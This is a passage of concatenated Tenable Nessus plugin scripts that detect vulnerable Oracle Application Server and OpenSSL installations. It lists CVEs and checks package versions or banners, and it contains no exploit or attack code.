  - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.

  - CVE-2004-1774: Buffer overflow in the MD2 package.

  - CVE-2004-1877: Phishing vulnerability in Single Sign-On
    component.

  - CVE-2004-2134: Weak cryptography for passwords in the
    toplink mapping workBench.

  - CVE-2004-2244: Denial of service in the XML parser.

  - CVE-2005-1383: Authentication bypass in HTTP Server.

  - CVE-2005-1495: Detection bypass.

  - CVE-2005-1496: Privilege escalation in the
    DBMS_Scheduler.

  - CVE-2005-2093: Web cache poisoning.

  - CVE-2005-3204: Cross-site scripting.

  - CVE-2005-3445: Multiple unspecified vulnerabilities in
    HTTP Server.

  - CVE-2005-3446: Unspecified vulnerability in Internet
    Directory.

  - CVE-2005-3447: Unspecified vulnerability in Single
    Sign-On.

  - CVE-2005-3448: Unspecified vulnerability in the OC4J
    module.

  - CVE-2005-3449: Multiple unspecified vulnerabilities in
    multiple components.

  - CVE-2005-3450: Unspecified vulnerability in HTTP Server.

  - CVE-2005-3451: Unspecified vulnerability in
    SQL*ReportWriter.

  - CVE-2005-3452: Unspecified vulnerability in Web Cache.

  - CVE-2005-3453: Multiple unspecified vulnerabilities in
    Web Cache.

  - CVE-2006-0273: Unspecified vulnerability in the Portal
    component.

  - CVE-2006-0274: Unspecified vulnerability in the Oracle
    Reports Developer component.

  - CVE-2006-0275: Unspecified vulnerability in the Oracle
    Reports Developer component.

  - CVE-2006-0282: Unspecified vulnerability.

  - CVE-2006-0283: Unspecified vulnerability.

  - CVE-2006-0284: Multiple unspecified vulnerabilities.

  - CVE-2006-0285: Unspecified vulnerability in the Java Net
    component.

  - CVE-2006-0286: Unspecified vulnerability in HTTP Server.

  - CVE-2006-0287: Unspecified vulnerability in HTTP Server.

  - CVE-2006-0288: Multiple unspecified vulnerabilities in
    the Oracle Reports Developer component.

  - CVE-2006-0289: Multiple unspecified vulnerabilities.

  - CVE-2006-0290: Unspecified vulnerability in the Oracle
    Workflow Cartridge component.

  - CVE-2006-0291: Multiple unspecified vulnerabilities in
    the Oracle Workflow Cartridge component.

  - CVE-2006-0435: Unspecified vulnerability in Oracle
    PL/SQL.

  - CVE-2006-0552: Unspecified vulnerability in the Net
    Listener component.

  - CVE-2006-0586: Multiple SQL injection vulnerabilities.

  - CVE-2006-1884: Unspecified vulnerability in the Oracle
    Thesaurus Management System component.

  - CVE-2006-3706: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3707: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3708: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3709: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3710: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3711: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3712: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3713: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-3714: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-5353: Unspecified vulnerability in HTTP Server.

  - CVE-2006-5354: Unspecified vulnerability in HTTP Server.

  - CVE-2006-5355: Unspecified vulnerability in Single
    Sign-On.

  - CVE-2006-5356: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-5357: Unspecified vulnerability in HTTP Server.

  - CVE-2006-5358: Unspecified vulnerability in the Oracle
    Forms component.

  - CVE-2006-5359: Multiple unspecified vulnerabilities in
    Oracle Reports Developer component.

  - CVE-2006-5360: Unspecified vulnerability in Oracle Forms
    component.

  - CVE-2006-5361: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-5362: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-5363: Unspecified vulnerability in Single
    Sign-On.

  - CVE-2006-5364: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2006-5365: Unspecified vulnerability in Oracle
    Forms.

  - CVE-2006-5366: Multiple unspecified vulnerabilities.

  - CVE-2007-0222: Directory traversal vulnerability in
    EmChartBean.

  - CVE-2007-0275: Cross-site scripting vulnerability in
    Oracle Reports Web Cartridge (RWCGI60).

  - CVE-2007-0280: Buffer overflow in Oracle Notification
    Service.

  - CVE-2007-0281: Multiple unspecified vulnerabilities in
    HTTP Server.

  - CVE-2007-0282: Unspecified vulnerability in OPMN02.

  - CVE-2007-0283: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2007-0284: Multiple unspecified vulnerabilities in
    Oracle Containers for J2EE.

  - CVE-2007-0285: Unspecified vulnerability in Oracle
    Reports Developer.

  - CVE-2007-0286: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2007-0287: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2007-0288: Unspecified vulnerability in Oracle
    Internet Directory.

  - CVE-2007-0289: Multiple unspecified vulnerabilities in
    Oracle Containers for J2EE.

  - CVE-2007-1359: Improper access control in mod_security.

  - CVE-2007-1609: Cross-site scripting vulnerability in
    servlet/Spy in Dynamic Monitoring Services (DMS).

  - CVE-2007-2119: Cross-site scripting vulnerability in the
    Administration Front End for Oracle Enterprise (Ultra)
    Search.

  - CVE-2007-2120: Denial of service in the Oracle
    Discoverer servlet.

  - CVE-2007-2121: Unspecified vulnerability in the COREid
    Access component.

  - CVE-2007-2122: Unspecified vulnerability in the Wireless
    component.

  - CVE-2007-2123: Unspecified vulnerability in the Portal
    component.

  - CVE-2007-2124: Unspecified vulnerability in the Portal
    component.

  - CVE-2007-2130: Unspecified vulnerability in Workflow
    Cartridge.

  - CVE-2007-3553: Cross-site scripting vulnerability in
    Rapid Install Web Server.

  - CVE-2007-3854: Multiple unspecified vulnerabilities in
    the Advanced Queuing component and the Spatial
    component.

  - CVE-2007-3859: Unspecified vulnerability in the Oracle
    Internet Directory component.

  - CVE-2007-3861: Unspecified vulnerability in Oracle
    Jdeveloper.

  - CVE-2007-3862: Unspecified vulnerability in Single
    Sign-On.

  - CVE-2007-3863: Unspecified vulnerability in Oracle
    JDeveloper.

  - CVE-2007-5516: Unspecified vulnerability in the Oracle
    Process Mgmt & Notification component.

  - CVE-2007-5517: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2007-5518: Unspecified vulnerability in HTTP Server.

  - CVE-2007-5519: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2007-5520: Unspecified vulnerability in the Oracle
    Internet Directory component.

  - CVE-2007-5521: Unspecified vulnerability in Oracle
    Containers for J2EE.

  - CVE-2007-5522: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2007-5523: Unspecified vulnerability in the Oracle
    Internet Directory component.

  - CVE-2007-5524: Unspecified vulnerability in Single
    Sign-On.

  - CVE-2007-5525: Unspecified vulnerability in Single
    Sign-On.

  - CVE-2007-5526: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2007-5531: Unspecified vulnerability in Oracle Help
    for Web.

  - CVE-2008-0340: Multiple unspecified vulnerabilities in
    the Advanced Queuing component and Spatial component.

  - CVE-2008-0343: Unspecified vulnerability in the Oracle
    Spatial component.

  - CVE-2008-0344: Unspecified vulnerability in the Oracle
    Spatial component.

  - CVE-2008-0345: Unspecified vulnerability in the Core
    RDBMS component.

  - CVE-2008-0346: Unspecified vulnerability in the Oracle
    Jinitiator component.

  - CVE-2008-0347: Unspecified vulnerability in the Oracle
    Ultra Search component.

  - CVE-2008-0348: Multiple unspecified vulnerabilities in
    the PeopleTools component.

  - CVE-2008-0349: Unspecified vulnerability in the
    PeopleTools component.

  - CVE-2008-1812: Unspecified vulnerability in the Oracle
    Enterprise Manager component.

  - CVE-2008-1814: Unspecified vulnerability in the Oracle
    Secure Enterprise Search or Ultrasearch component.

  - CVE-2008-1823: Unspecified vulnerability in the Oracle
    Jinitiator component.

  - CVE-2008-1824: Unspecified vulnerability in the Oracle
    Dynamic Monitoring Service component.

  - CVE-2008-1825: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-2583: Unspecified vulnerability in the sample
    Discussion Forum Portlet for the Oracle Portal
    component.

  - CVE-2008-2588: Unspecified vulnerability in the Oracle
    JDeveloper component.

  - CVE-2008-2589: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-2593: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-2594: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-2595: Unspecified vulnerability in the Oracle
    Internet Directory component.

  - CVE-2008-2609: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-2612: Unspecified vulnerability in the Hyperion
    BI Plus component.

  - CVE-2008-2614: Unspecified vulnerability in HTTP Server.

  - CVE-2008-2619: Unspecified vulnerability in the Oracle
    Reports Developer component.

  - CVE-2008-2623: Unspecified vulnerability in the Oracle
    JDeveloper component.

  - CVE-2008-3975: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-3977: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-3986: Unspecified vulnerability in the Oracle
    Discoverer Administrator component.

  - CVE-2008-3987: Unspecified vulnerability in the Oracle
    Discoverer Desktop component.

  - CVE-2008-4014: Unspecified vulnerability in the Oracle
    BPEL Process Manager component.

  - CVE-2008-4017: Unspecified vulnerability in the OC4J
    component.

  - CVE-2008-5438: Unspecified vulnerability in the Oracle
    Portal component.

  - CVE-2008-7233: Unspecified vulnerability in the Oracle
    Jinitiator component.

  - CVE-2009-0217: Signature spoofing vulnerability in
    multiple components.

  - CVE-2009-0989: Unspecified vulnerability in the BI
    Publisher component.

  - CVE-2009-0990: Unspecified vulnerability in the BI
    Publisher component.

  - CVE-2009-0994: Unspecified vulnerability in the BI
    Publisher component.

  - CVE-2009-1008: Unspecified vulnerability in the Outside
    In Technology component.

  - CVE-2009-1009: Unspecified vulnerability in the Outside
    In Technology component.

  - CVE-2009-1010: Unspecified vulnerability in the Outside
    In Technology component.

  - CVE-2009-1011: Unspecified vulnerability in the Outside
    In Technology component.

  - CVE-2009-1017: Unspecified vulnerability in the BI
    Publisher component.

  - CVE-2009-1976: Unspecified vulnerability in HTTP Server.

  - CVE-2009-1990: Unspecified vulnerability in the Business
    Intelligence Enterprise Edition component.

  - CVE-2009-1999: Unspecified vulnerability in the Business
    Intelligence Enterprise Edition component.

  - CVE-2009-3407: Unspecified vulnerability in the Portal
    component.

  - CVE-2009-3412: Unspecified vulnerability in the Unzip
    component.

  - CVE-2010-0066: Unspecified vulnerability in the Access
    Manager Identity Server component.

  - CVE-2010-0067: Unspecified vulnerability in the Oracle
    Containers for J2EE component.

  - CVE-2010-0070: Unspecified vulnerability in the Oracle
    Containers for J2EE component.

  - CVE-2011-0789: Unspecified vulnerability in HTTP Server.

  - CVE-2011-0795: Unspecified vulnerability in Single
    Sign-On.

  - CVE-2011-0884: Unspecified vulnerability in the Oracle
    BPEL Process Manager component.

  - CVE-2011-2237: Unspecified vulnerability in the Oracle
    Web Services Manager component.

  - CVE-2011-2314: Unspecified vulnerability in the Oracle
    Containers for J2EE component.

  - CVE-2011-3523: Unspecified vulnerability in the Oracle
    Web Services Manager component.");
  script_set_attribute(attribute:"solution", value:
"Verify that the version of Oracle Application Server installed is not
affected by the listed vulnerabilities and/or filter incoming traffic to this port");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"manual");
  script_set_attribute(attribute:"cvss_score_rationale", value:"remote code execution");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploithub_sku", value:"EH-11-053");
  script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Oracle Secure Backup 10.2.0.2 RCE (Windows)");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(22, 79, 119, 200, 255, 264, 287);
  script_set_attribute(attribute:"vuln_publication_date", value:"2000/03/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/10/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/01/24");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:application_server");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("find_service2.nasl");
  script_require_keys("Settings/PCI_DSS", "Settings/ParanoidReport");
  script_require_ports("Services/oracle_application_server");

  exit(0);
}

include("global_settings.inc");
include("http.inc");
include("misc_func.inc");

# Only PCI considers this an issue.
if (!get_kb_item("Settings/PCI_DSS")) exit(0, "PCI-DSS compliance checking is not enabled.");

# Make sure this is Oracle.
port = get_kb_item_or_exit("Services/oracle_application_server");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

# We're flagging every installation of Oracle Application Server, with
# every vulnerability it has ever had.
security_hole(port);

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Red Hat Security Advisory RHSA-2002:161. The text 
# itself is copyright (C) Red Hat, Inc.
#

include("compat.inc");

if (description)
{
  script_id(12316);
  script_version ("1.25");
  script_cvs_date("Date: 2019/10/25 13:36:09");

  script_cve_id("CVE-2002-0659");
  script_xref(name:"RHSA", value:"2002:161");

  script_name(english:"RHEL 2.1 : openssl (RHSA-2002:161)");
  script_summary(english:"Checks the rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Red Hat host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Updated OpenSSL packages are available for Red Hat Linux Advanced
Server. These updates fix multiple protocol parsing bugs, which may
cause a denial of service (DoS) attack or cause SSL-enabled
applications to crash.

[Updated 06 Jan 2003] Added fixed packages for the ia64 architecture.

[Updated 06 Feb 2003] Added fixed packages for Advanced Workstation
2.1

OpenSSL is a commercial-grade, full-featured, and open source toolkit
which implements the Secure Sockets Layer (SSL v2/v3) and Transport
Layer Security (TLS v1) protocols as well as a full-strength general
purpose cryptography library.

Portions of the SSL protocol data stream, which include the lengths of
structures which are being transferred, may not be properly validated.
This may allow a malicious server or client to cause an affected
application to crash or enter an infinite loop, which can be used as a
denial of service (DoS) attack if the application is a server. It has
not been verified if this issue could lead to further consequences
such as remote code execution.

These errata packages contain a patch to correct this vulnerability.
Please note that the original patch from the OpenSSL team had a
mistake in it which could possibly still allow buffer overflows to
occur. This bug is also fixed in these errata packages.

NOTE :

Please read the Solution section below as it contains instructions for
making sure that all SSL-enabled processes are restarted after the
update is applied.

Thanks go to the OpenSSL team for providing patches for these issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2002-0659"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/errata/RHSA-2002:161"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssl");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssl-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssl-perl");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssl095a");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssl096");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:2.1");

  script_set_attribute(attribute:"vuln_publication_date", value:"2002/08/12");
  script_set_attribute(attribute:"patch_publication_date", value:"2003/02/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/07/06");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Red Hat Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^2\.1([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 2.1", "Red Hat " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);

yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo)) 
{
  rhsa = "RHSA-2002:161";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (!empty_or_null(yum_report))
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_WARNING,
      extra      : yum_report 
    );
    exit(0);
  }
  else
  {
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
}
else
{
  flag = 0;
  if (rpm_check(release:"RHEL2.1", cpu:"i386", reference:"openssl-0.9.6b-28")) flag++;
  if (rpm_check(release:"RHEL2.1", cpu:"i686", reference:"openssl-0.9.6b-28")) flag++;
  if (rpm_check(release:"RHEL2.1", cpu:"i386", reference:"openssl-devel-0.9.6b-28")) flag++;
  if (rpm_check(release:"RHEL2.1", cpu:"i386", reference:"openssl-perl-0.9.6b-28")) flag++;
  if (rpm_check(release:"RHEL2.1", cpu:"i386", reference:"openssl095a-0.9.5a-18")) flag++;
  if (rpm_check(release:"RHEL2.1", cpu:"i386", reference:"openssl096-0.9.6-13")) flag++;

  if (flag)
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_WARNING,
      extra      : rpm_report_get() + redhat_report_package_caveat()
    );
    exit(0);
  }
  else
  {
    tested = pkg_tests_get();
    if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssl / openssl-devel / openssl-perl / openssl095a / openssl096");
  }
}

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(17746);
  script_version("1.12");
  script_cvs_date("Date: 2018/07/16 14:09:14");

  script_cve_id("CVE-2002-0655", "CVE-2002-0656", "CVE-2002-0659");
  script_bugtraq_id(5362, 5363, 5364, 5366);
  script_xref(name:"CERT-CC", value:"CA-2002-23");
  script_xref(name:"CERT", value:"102795");
  script_xref(name:"CERT", value:"308891");

  script_name(english:"OpenSSL < 0.9.6e Multiple Vulnerabilities");
  script_summary(english:"Does a banner check");

  script_set_attribute(attribute:"synopsis", value:
"The remote server is affected by multiple SSL-related
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its banner, the remote server is running a version of
OpenSSL that is earlier than 0.9.6e.  Such versions have the following
vulnerabilities :

  - On 64 bit architectures, these versions are vulnerable 
    to a buffer overflow that leads to a denial of service. 
    (CVE-2002-0655)

  - Buffer overflows allow a remote attacker to execute 
    arbitrary code. (CVE-2002-0656)

  - A remote attacker can trigger a denial of service by 
    sending invalid ASN.1 data. (CVE-2002-0659)");
  script_set_attribute(attribute:"solution", value:"Upgrade to OpenSSL 0.9.6e or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"vuln_publication_date", value:"2002/07/30");
  script_set_attribute(attribute:"patch_publication_date", value:"2002/07/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/01/04");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:openssl:openssl");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.");

  script_dependencies("openssl_version.nasl");
  script_require_keys("openssl/port");

  exit(0);
}

include("openssl_version.inc");

openssl_check_version(fixed:'0.9.6e', severity:SECURITY_HOLE);